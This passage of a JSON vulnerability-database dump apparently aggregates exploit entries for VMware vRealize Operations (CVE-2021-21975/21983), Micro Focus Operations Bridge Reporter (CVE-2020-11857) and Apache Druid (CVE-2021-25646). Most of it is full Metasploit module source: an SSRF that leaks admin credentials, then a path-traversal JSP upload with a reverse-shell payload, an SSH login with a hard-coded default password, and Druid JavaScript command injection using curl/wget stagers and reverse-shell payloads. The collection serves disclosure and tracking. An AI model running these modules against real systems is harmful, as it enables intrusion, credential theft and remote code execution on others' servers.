[ajp-nio-127.0.0.1-8011-exec-10] INFO casa.support.RequestIdIncomingInterceptor:93 - Request POST /casa/private/config/slice/ha/certificate: Done\n```\n\nNote that the SSRF most likely requires a callback address in order to extract the `Authorization: Basic` header and any credentials it contains.\n\n# Guidance\n\nPlease see the **Response Matrix** in the [advisory](https://www.vmware.com/security/advisories/VMSA-2021-0004.html) for fixed versions and workarounds.\n\n# References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n- https://twitter.com/ptswarm/status/1376961747232382976", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager SSRF\u548c\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-21975 CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99173", "href": "https://www.seebug.org/vuldb/ssvid-99173", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-07-24T15:47:15", "description": "", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "seebug", "title": "VMware vRealize Operations Manager \u4efb\u610f\u6587\u4ef6\u5199\u5165\u6f0f\u6d1e\uff08CVE-2021-21983\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21983"], "modified": "2021-03-31T00:00:00", "id": "SSV:99174", "href": "https://www.seebug.org/vuldb/ssvid-99174", "sourceData": "", "sourceHref": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-18T23:22:38", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2021-12-28T04:37:24", "description": "This Metasploit module abuses a known default password on Micro Focus Operations Bridge Reporter. The shrboadmin user, installed by default by the product has the password of shrboadmin, and allows an attacker to login to the server via SSH. This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier versions are most likely affected too. Note that this is only exploitable in Linux installations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "Micro Focus Operations Bridge Reporter shrboadmin Default Password Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11857"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36169", "href": "https://0day.today/exploit/description/36169", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'net/ssh'\nrequire 'net/ssh/command_stream'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::SSH\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Micro Focus Operations Bridge Reporter shrboadmin default password',\n 'Description' => %q{\n This module abuses a known default password on Micro Focus Operations Bridge Reporter.\n The 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin',\n and allows an attacker to login to the server via SSH.\n This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier\n versions are most likely affected too.\n Note that this is only exploitable in Linux installations.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2020-11857' ],\n [ 'ZDI', '20-1215' ],\n [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ],\n [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Payload' =>\n {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact',\n 'ConnectionType' => 'find'\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-09-21'\n )\n )\n\n register_options(\n [\n Opt::RPORT(22),\n OptString.new('USERNAME', [true, 'Username to login with', 'shrboadmin']),\n OptString.new('PASSWORD', [true, 'Password to login with', 'shrboadmin']),\n ], self.class\n )\n\n register_advanced_options(\n [\n OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),\n OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])\n ]\n )\n end\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\n\n def do_login(user, pass)\n factory = ssh_socket_factory\n opts = {\n auth_methods: ['password', 'keyboard-interactive'],\n port: rport,\n use_agent: false,\n config: false,\n password: pass,\n proxy: factory,\n non_interactive: true,\n verify_host_key: :never\n }\n\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n begin\n ssh = nil\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\n ssh = Net::SSH.start(rhost, user, opts)\n end\n rescue Rex::ConnectionError\n return\n rescue Net::SSH::Disconnect, ::EOFError\n print_error \"#{rhost}:#{rport} SSH - Disconnected during negotiation\"\n return\n rescue ::Timeout::Error\n print_error \"#{rhost}:#{rport} SSH - Timed out during negotiation\"\n return\n rescue Net::SSH::AuthenticationFailed\n print_error \"#{rhost}:#{rport} SSH - Failed authentication\"\n rescue Net::SSH::Exception => e\n print_error \"#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}\"\n return\n end\n\n if ssh\n conn = Net::SSH::CommandStream.new(ssh)\n ssh = nil\n return conn\n end\n\n return nil\n end\n\n def exploit\n user = datastore['USERNAME']\n pass = datastore['PASSWORD']\n\n print_status(\"#{rhost}:#{rport} - Attempt to login to the server...\")\n conn = do_login(user, pass)\n if conn\n print_good(\"#{rhost}:#{rport} - Login Successful (#{user}:#{pass})\")\n handler(conn.lsock)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36169", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-27T13:50:07", "description": "Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests; however, that feature is disabled by default. In Druid versions prior to 0.20.1, an authenticated user can send a specially-crafted request that both enables the JavaScript code-execution feature and executes the supplied code all at once, allowing for code execution on the server with the privileges of the Druid Server process. More critically, authentication is not enabled in Apache Druid by default.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "Apache Druid 0.20.0 Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36159", "href": "https://0day.today/exploit/description/36159", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache Druid 0.20.0 Remote Command Execution',\n 'Description' => %q{\n Apache Druid includes the ability to execute user-provided JavaScript code embedded in\n various types of requests; however, that feature is disabled by default.\n\n In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request\n that both enables the JavaScript code-execution feature and executes the supplied code all\n at once, allowing for code execution on the server with the privileges of the Druid Server process.\n More critically, authentication is not enabled in Apache Druid by default.\n\n Tested on the following Apache Druid versions:\n\n * 0.15.1\n * 0.16.0-iap8\n * 0.17.1\n * 0.18.0-iap3\n * 0.19.0-iap7\n * 0.20.0-iap4.1\n * 0.20.0\n * 0.21.0-iap3\n },\n 'Author' => [\n 'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery\n 'je5442804' # Metasploit module\n ],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'References' => [\n ['CVE', '2021-25646'],\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],\n ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],\n ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']\n ],\n 'DisclosureDate' => '2021-01-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Targets' => [\n [\n 'Linux (dropper)', {\n 'Platform' => 'linux',\n 'Type' => :linux_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' },\n 'CmdStagerFlavor' => %w[curl wget],\n 'Arch' => [ARCH_X86, ARCH_X64]\n }\n ],\n [\n 'Unix (in-memory)', {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Privileged' => false,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8888),\n OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/'])\n ])\n end\n\n def execute_command(cmd, _opts = {})\n gencmd = '/bin/sh`@~-c`@~' + cmd\n genvar = Rex::Text.rand_text_alpha(8..12)\n genname = Rex::Text.rand_text_alpha(8..12)\n vprint_status(\"cmd= #{gencmd} var=#{genvar} name=#{genname}\")\n post_data = {\n type: 'index',\n spec: {\n ioConfig: {\n type: 'index',\n firehose: {\n type: 'local',\n baseDir: '/etc',\n filter: 'passwd'\n }\n },\n dataSchema: {\n dataSource: Rex::Text.rand_text_alpha(8..12),\n parser: {\n parseSpec: {\n format: 'javascript',\n timestampSpec: {},\n dimensionsSpec: {},\n function: \"function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"#{gencmd}\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"#{rand(1..9999999)}\\\",#{genname}: #{genvar}}}\",\n \"\": {\n enabled: 'true'\n }\n }\n }\n }\n },\n samplerConfig: {\n numRows: 10\n }\n }.to_json\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'),\n 'ctype' => 'application/json',\n 'headers' => {\n 'Accept' => 'application/json, text/plain, */*'\n },\n 'data' => post_data\n })\n end\n\n def check\n genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a')\n\n vprint_status(\"Attempting to execute 'echo #{genecho}' on the target.\")\n res = execute_command(\"echo #{genecho}\")\n unless res\n return CheckCode::Unknown('Connection failed.')\n end\n\n unless res.code == 200\n return CheckCode::Safe\n end\n\n if res.body.include?(genecho)\n return CheckCode::Vulnerable\n end\n\n CheckCode::Unknown('Target does not seem to be running Apache Druid.')\n end\n\n def exploit\n case target['Type']\n when :linux_dropper\n execute_cmdstager\n when :unix_memory\n execute_command(payload.encoded)\n end\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36159", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations Manager API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:47:42", "description": "# CVE-2021-25646 Apache Druid \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Wker\u811a\u672c\n\n\u7f16\u5199ing...\n\n=======...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-14T15:36:04", "type": "githubexploit", "title": "Exploit for Vulnerability in Apache Druid", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2022-05-17T02:20:31", "id": "BFE57812-E8DA-5B2F-9C64-DC10E559D926", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:21", "description": "# Apache-Druid-CV...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-13T11:48:35", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Apache Druid", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25646"], "modified": "2021-10-10T08:48:00", "id": "05540576-A7EF-54DF-906F-E2D55408AD36", "href": "", "cvss": 